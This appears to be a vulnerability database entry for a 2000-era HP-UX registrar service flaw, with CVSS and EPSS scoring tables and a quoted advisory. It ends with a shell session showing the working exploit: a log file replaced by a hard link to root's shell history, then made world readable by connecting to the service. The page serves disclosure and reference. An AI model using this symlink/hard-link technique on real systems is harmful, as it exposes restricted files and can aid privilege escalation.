CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
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registrar in the HP resource monitor service allows local users to read and modify arbitrary files by renaming the original registrar.log log file and creating a symbolic link to the target file, to which registrar appends log information and sets the permissions to be world readable.
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Metrics
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Severity
CVSS Vector
Source
V2
3.6
AV:L/AC:L/Au:N/C:P/I:P/A:N
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
1.76%
–
–
2022-03-27
–
–
1.76%
–
–
2022-04-03
–
–
1.76%
–
–
2022-04-17
–
–
1.76%
–
–
2022-08-28
–
–
1.76%
–
–
2023-03-05
–
–
1.76%
–
–
2023-03-12
–
–
–
0.04%
–
2024-06-02
–
–
–
0.04%
–
2025-01-19
–
–
–
0.04%
–
2025-03-18
–
–
–
–
0.44%
2025-03-30
–
–
–
–
0.53%
2025-04-15
–
–
–
–
0.53%
2025-04-15
–
–
–
–
0.53,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Publication date : 2000-11-07 23h00 +00:00 Author : J.A. Gutierrez EDB Verified : Yes
source: https://www.securityfocus.com/bid/1919/info
The registrar service that ships with version 10.20 (possibly others) of HP's HP-UX operating system contains a vulnerability that may allow a local user to read any file on the hosts filesystem. The service (which listens on tcp port 1712) writes to a log file, /etc/opt/resmon/log/registrar.log.
Default permissions on the /etc/opt/resmon/log directory allow users to overwrite the log file within it via "mv", which is normally created and written to by root when connections are made to the service.
After mv'ing an existing log file to another location, a malicious user can create a symbolic link to an arbitrary file they do not have read access to with the filename registrar.log in etc/opt/resmon/log. If any connections are made to the registrar service after this, the mode of the file pointed to will change to 0644 (world readable) and log data will be appended to it.
In addition to disclosing to the user restricted information, this may lead to an elevation of privileges for the local attacker.
$ uname -sr
HP-UX B.10.20
$ cd /etc/opt/resmon/log
$ mv registrar.log registrar.log.orig
$ ls -l /.sh_history
-rw------- 1 root sys 3316 Sep 20 15:22 /.sh_history
$ ln /.sh_history registrar.log
$ nc hpux.example.com 1712 < /etc/motd
$ ls -l /.sh_history
-rw-r--r-- 2 root sys 3605 Nov 8 09:45 /.sh_history
$ rm -f registrar.log
$ mv registrar.log.orig registrar.log